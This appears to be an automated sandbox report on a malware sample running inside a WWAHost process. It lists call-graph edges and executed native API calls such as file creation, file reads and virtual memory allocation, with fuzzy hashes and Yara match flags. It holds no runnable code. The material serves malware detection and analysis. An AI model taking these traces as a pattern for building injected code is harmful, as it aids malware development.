32452->32326 32453->32332 32454->32329 32455->32333 32457 a6c3d3 32456->32457 32501 a6a740 32457->32501 32459 a6c3e5 32505 a6a8b0 32459->32505 32461 a6c403 32462 a6a8b0 LdrLoadDll 32461->32462 32463 a6c419 32462->32463 32464 a6d7f0 3 API calls 32463->32464 32465 a6c43d 32464->32465 32466 a6c444 32465->32466 32467 a7c0f0 2 API calls 32465->32467 32466->32415 32468 a6c454 32467->32468 32468->32415 32470 a6402c 32469->32470 32471 a6b930 3 API calls 32470->32471 32473 a64103 32471->32473 32472 a64695 32472->32419 32473->32472 32508 a7c130 32473->32508 32475 a6416e 32476 a6a480 LdrLoadDll 32475->32476 32477 a642f4 32476->32477 32478 a6a480 LdrLoadDll 32477->32478 32479 a64318 32478->32479 32512 a6b9f0 32479->32512 32483 a643b3 32484 a64479 32483->32484 32485 a6b9f0 2 API calls 32483->32485 32487 a7be60 2 API calls 32484->32487 32486 a64452 32485->32486 32486->32484 32488 a7a0d0 2 API calls 32486->32488 32489 a644e6 32487->32489 32488->32484 32490 a7be60 2 API calls 32489->32490 32491 a644ff 32490->32491 32491->32472 32492 a6a480 LdrLoadDll 32491->32492 32493 a64547 32492->32493 32494 a6a350 LdrLoadDll 32493->32494 32495 a645f9 32494->32495 32495->32419 32497 a75a90 LdrLoadDll 32496->32497 32499 a79181 32497->32499 32498 a791a7 32498->32422 32499->32498 32500 a79194 CreateThread 32499->32500 32500->32422 32502 a6a767 32501->32502 32503 a6a480 LdrLoadDll 32502->32503 32504 a6a7a3 32503->32504 32504->32459 32506 a6a480 LdrLoadDll 32505->32506 32507 a6a8c9 32505->32507 32506->32507 32507->32461 32509 a7c13d 32508->32509 32510 a75a90 LdrLoadDll 32509->32510 32511 a7c150 32510->32511 32511->32475 32513 a6ba15 32512->32513 32521 a7a040 32513->32521 32516 a7a0d0 32517 a7af60 LdrLoadDll 32516->32517 32518 a7a0ec 32517->32518 32527 3999650 LdrInitializeThunk 32518->32527 32519 a7a10b 32519->32483 32522 a7af60 LdrLoadDll 32521->32522 32523 a7a05c 32522->32523 32526 39996d0 LdrInitializeThunk 32523->32526 32524 a6438c 32524->32483 32524->32516 32526->32524 32527->32519 32528->32424 32530 a7af60 LdrLoadDll 32529->32530 32531 a79e5c 32530->32531 32534 3999840 LdrInitializeThunk 32531->32534 32532 a6d9fe 32532->32223 32534->32532

                                              Executed Functions

                                              Function 00A7A362 Relevance: 1.5, APIs: 1, Instructions: 49filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 571 a7a362-a7a36e 572 a7a370-a7a3b9 call a7af60 571->572 573 a7a35a-a7a361 NtCreateFile 571->573
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,00A757F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00A757F7,00000000,00000005,00000060,00000000,00000000), ref: 00A7A35D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: b8b1eca4023a4224850d0a7766588fd8bf7e5694ba4b3bfc33043a2d150a0a9c
                                              • Instruction ID: 1eb54bf31701ae405ed57ad771eef8b3c71f5a6600e83bccd1d9f6261a1a5f69
                                              • Opcode Fuzzy Hash: b8b1eca4023a4224850d0a7766588fd8bf7e5694ba4b3bfc33043a2d150a0a9c
                                              • Instruction Fuzzy Hash: A9016DB62001087FCB04DF98DC85DEB77ADEF8C714F158219FA0D97200D630E8118BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A3BA Relevance: 1.5, APIs: 1, Instructions: 48filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 592 a7a3ba-a7a3bc 593 a7a3be-a7a409 call a7af60 NtReadFile 592->593 594 a7a428-a7a439 592->594
                                              APIs
                                              • NtReadFile.NTDLL(00A759B2,5DA515B3,FFFFFFFF,00A75671,00000206,?,00A759B2,00000206,00A75671,FFFFFFFF,5DA515B3,00A759B2,00000206,00000000), ref: 00A7A405
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: ba7d17e1ab1e577a1e06a908f81c5c003ca4133987aba70ea4fc1b5d1209730a
                                              • Instruction ID: ede7d9d811b4a2a2d363c6e55febb2499c9f4ed7ccbad51a603caae63b802cac
                                              • Opcode Fuzzy Hash: ba7d17e1ab1e577a1e06a908f81c5c003ca4133987aba70ea4fc1b5d1209730a
                                              • Instruction Fuzzy Hash: 050128B6200208AFDB14DF98DC81DDB77A9EF8C754F158249FE1D97241D630E911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A30A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 598 a7a30a-a7a30e 599 a7a310-a7a335 call a7af60 598->599 600 a7a338-a7a361 NtCreateFile 598->600 599->600
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,00A757F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00A757F7,00000000,00000005,00000060,00000000,00000000), ref: 00A7A35D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 32f7e0c1916e3533ce71feb1a096f2378f59f5777a5a2596ddc91a6e9e26e58c
                                              • Instruction ID: af1cc20d126cc72eeaf4d5d80d9ee54fc5de1fc221aab8208aeff4af8c06de5b
                                              • Opcode Fuzzy Hash: 32f7e0c1916e3533ce71feb1a096f2378f59f5777a5a2596ddc91a6e9e26e58c
                                              • Instruction Fuzzy Hash: 8801AFB6215208BBCB18DF89DC85EEB77ADAF8C754F118258FA0D97241D630E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,00A757F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00A757F7,00000000,00000005,00000060,00000000,00000000), ref: 00A7A35D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                              • Instruction ID: a5eb3c8dd1140d9272079295a8639aacd8903b2cc18265463bf31ea739d1617e
                                              • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                              • Instruction Fuzzy Hash: E6F06DB6215208AFCB48DF89DC95EEB77ADAF8C754F118248FA0D97241D630F8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtReadFile.NTDLL(00A759B2,5DA515B3,FFFFFFFF,00A75671,00000206,?,00A759B2,00000206,00A75671,FFFFFFFF,5DA515B3,00A759B2,00000206,00000000), ref: 00A7A405
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                              • Instruction ID: 461a2e37bf96e54d497b9c65a72347570f92fd5016063989958e3a82315ea3c3
                                              • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                              • Instruction Fuzzy Hash: 48F0A4B2200208ABCB14DF99DC85EEB77ADEF8C754F118248FA0D97241D630E811CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A62D11,00002000,00003000,00000004), ref: 00A7A529
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                              • Instruction ID: 3b74d1da40cb733c983e3c2292bca8844ecf40ffeb61d7921b849dca3b5de6c2
                                              • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                              • Instruction Fuzzy Hash: 49F0FBB2210208ABDB18DF89DC81EAB77ADAF88654F118208FA0C97241C630E8108BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A4F4 Relevance: 1.5, APIs: 1, Instructions: 26memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A62D11,00002000,00003000,00000004), ref: 00A7A529
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 8634ee6ed7bfca7443beaefcd15ddafe59e3c79bb15027a68cbb6190d0aba2a6
                                              • Instruction ID: fac25125c3da6aa4af934090c7b326891b56740244602550c64597c75ee8b994
                                              • Opcode Fuzzy Hash: 8634ee6ed7bfca7443beaefcd15ddafe59e3c79bb15027a68cbb6190d0aba2a6
                                              • Instruction Fuzzy Hash: 2AE06DB11001496BCB04DF98DC84CAB77A8EF88214B15C64DFD5C97202C230E810CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A4EA Relevance: 1.5, APIs: 1, Instructions: 25memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A62D11,00002000,00003000,00000004), ref: 00A7A529
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: a6ba039d40078b57a8e6a5020a7563452cc8b7e99234bda18bf8aa51e7f7e803
                                              • Instruction ID: 57572923b40a41b4d90eee22375ed9bcaa6cc5b601d09cf83eb69468cf8a69c8
                                              • Opcode Fuzzy Hash: a6ba039d40078b57a8e6a5020a7563452cc8b7e99234bda18bf8aa51e7f7e803
                                              • Instruction Fuzzy Hash: 06E012B6204549AFCB04DF58DC91CAB77A9EF98324B10C309F96D83245C635D8118BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A43B Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtClose.NTDLL(00A75990,00000206,?,00A75990,00000005,FFFFFFFF), ref: 00A7A465
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 0ca211cdc27ca343ba54fe3d9302d7d8781cfd5c11fab4473d64bedbb8ba02ae
                                              • Instruction ID: 9949b3fd926c15fb1633340584caabf04a42dddcb0b1728b49e192161648748a
                                              • Opcode Fuzzy Hash: 0ca211cdc27ca343ba54fe3d9302d7d8781cfd5c11fab4473d64bedbb8ba02ae
                                              • Instruction Fuzzy Hash: 20E08C722442106ED720DBA8CC8AE9B7B98DF49220F10C298FA9D9B283C531E601C7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A7A440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtClose.NTDLL(00A75990,00000206,?,00A75990,00000005,FFFFFFFF), ref: 00A7A465
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                              • Instruction ID: e0d89d5954e8a78a2fd36009e7db0b0294b0197bd04312b0b887b2c42ec3b2a7
                                              • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                              • Instruction Fuzzy Hash: 65D01772200218BBD620EB98DC89E9B7BACDF88A60F118055FA4C5B242C530FA0086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2d55ba4e611c008abab427971523095a2fce012b500a6d0912159ae73f385d66
                                              • Instruction ID: a8dada2353cdf9b022449096b0ddb36b047e694fd286b34b3a8e5e80d8abf401
                                              • Opcode Fuzzy Hash: 2d55ba4e611c008abab427971523095a2fce012b500a6d0912159ae73f385d66
                                              • Instruction Fuzzy Hash: AF900261211D4452D200A56D4C24B07005597D0347F91C215A0144594CCE55886165A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039999A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1cd232d3a5b243bb06ab8d6e69ae08501d2571145905ff631ae5168b9e5d9234
                                              • Instruction ID: 757c11c473d78f79a5365519b2556be8f478889b3b17b3d43dca283d9ef130d1
                                              • Opcode Fuzzy Hash: 1cd232d3a5b243bb06ab8d6e69ae08501d2571145905ff631ae5168b9e5d9234
                                              • Instruction Fuzzy Hash: 939002A134154852D100A15D4424B060055D7E1345F91C115E1054594D8B59CC5271A6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 30f3e2d3f3dd8beef991e374b68dccf34926be16a725a4ffd8bdeb7dd105990e
                                              • Instruction ID: 902b276740582f8924b91c435b7a836592c54556039be82e1e80f5af82fdf6f3
                                              • Opcode Fuzzy Hash: 30f3e2d3f3dd8beef991e374b68dccf34926be16a725a4ffd8bdeb7dd105990e
                                              • Instruction Fuzzy Hash: 7E9002B120154812D140B15D4414746005597D0345F91C111A5054594E8B998DD576E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 97159ae5ef987141599cd4e0c946e768b887809342f4f1091f522ea0ee54b39f
                                              • Instruction ID: 62bb728fe4a3b07e46536fb5b89e7430997beb0df3b2a464850b41fa41635f9d
                                              • Opcode Fuzzy Hash: 97159ae5ef987141599cd4e0c946e768b887809342f4f1091f522ea0ee54b39f
                                              • Instruction Fuzzy Hash: F9900261242585625545F15D44145074056A7E02857D1C112A1404990C8A669856E6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 529fded06f95b6716a8052f2f49877aaebd8ad9c0923db79e3fc8242ef01fb3c
                                              • Instruction ID: 6462ea857a9249b3ea686817e588331476579443f99dacd79387abbf21079bd4
                                              • Opcode Fuzzy Hash: 529fded06f95b6716a8052f2f49877aaebd8ad9c0923db79e3fc8242ef01fb3c
                                              • Instruction Fuzzy Hash: 2090027120154823D111A15D4514707005997D0285FD1C512A0414598D9B968952B1A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 013434a9b08f6584d41ba20dbfc7e4754270b9ff3b3786cd54b7d9cd0470a1a6
                                              • Instruction ID: de62e0c2401a796308626bc7923b656b3d7e6729a021487f3cb98e3e8e79e4d4
                                              • Opcode Fuzzy Hash: 013434a9b08f6584d41ba20dbfc7e4754270b9ff3b3786cd54b7d9cd0470a1a6
                                              • Instruction Fuzzy Hash: 5890026921354412D180B15D541860A005597D1246FD1D515A0005598CCE55886963A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7cc115e16c48011f45d7d9659f8195cbdab20280b7a1b7234515ac1b4e6038b6
                                              • Instruction ID: 75b6eb21732650db623168adac8ff1581b9d01f2d3cb82227b752d92561c3f0f
                                              • Opcode Fuzzy Hash: 7cc115e16c48011f45d7d9659f8195cbdab20280b7a1b7234515ac1b4e6038b6
                                              • Instruction Fuzzy Hash: C990027131168812D110A15D8414706005597D1245F91C511A0814598D8BD5889171A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 818590e6338fbb831b8d2e1d5d9246a6866cdb76973bd801daceb92bed262cb3
                                              • Instruction ID: 4079803de83752fbee86603428507d6608f6de048f624c166ed87a6389f44322
                                              • Opcode Fuzzy Hash: 818590e6338fbb831b8d2e1d5d9246a6866cdb76973bd801daceb92bed262cb3
                                              • Instruction Fuzzy Hash: CA90027120154812D100A59D5418646005597E0345F91D111A5014595ECBA5889171B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039996D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f50809b3d611b6ce595f920e8bed52076011a701ae46bd272859ff8217af16ff
                                              • Instruction ID: c22da97ceafa93ca336d5fb1d3cefc49960eceb0a5a7a311d9fba7089a289b69
                                              • Opcode Fuzzy Hash: f50809b3d611b6ce595f920e8bed52076011a701ae46bd272859ff8217af16ff
                                              • Instruction Fuzzy Hash: C790027120154C52D100A15D4414B46005597E0345F91C116A0114694D8B55C85175A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039996E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 12164ed4a2f734e794a7902a4c0da6ad3c8890d3c6af357e77e485d02e603ad1
                                              • Instruction ID: 53dee76d34b4cb22686f7a29d3a21ec071d330a92933835250687afb29b74273
                                              • Opcode Fuzzy Hash: 12164ed4a2f734e794a7902a4c0da6ad3c8890d3c6af357e77e485d02e603ad1
                                              • Instruction Fuzzy Hash: 7C9002712015CC12D110A15D841474A005597D0345F95C511A4414698D8BD5889171A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3a5ce1d2f878afb662197f846439035bcf47654d54b42a0adbbe25ff9c1d802d
                                              • Instruction ID: 7193130a057c8e8856a5f3579388c283a6f49ddad332839c764c7248c6f9191c
                                              • Opcode Fuzzy Hash: 3a5ce1d2f878afb662197f846439035bcf47654d54b42a0adbbe25ff9c1d802d
                                              • Instruction Fuzzy Hash: 2890027120558C52D140B15D4414A46006597D0349F91C111A00546D4D9B658D55B6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03999660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 59c1392b3aefc906811481f2063cfe3633a81d23fd38893422408bdcecdf4094
                                              • Instruction ID: 061ba668ec6af407a5a839d3c1acd55e81cd37ecce4042d4e56467ff6f9580e0
                                              • Opcode Fuzzy Hash: 59c1392b3aefc906811481f2063cfe3633a81d23fd38893422408bdcecdf4094
                                              • Instruction Fuzzy Hash: 1D90027120154C12D180B15D441464A005597D1345FD1C115A0015694DCF558A5977E1
                                              Uniqueness

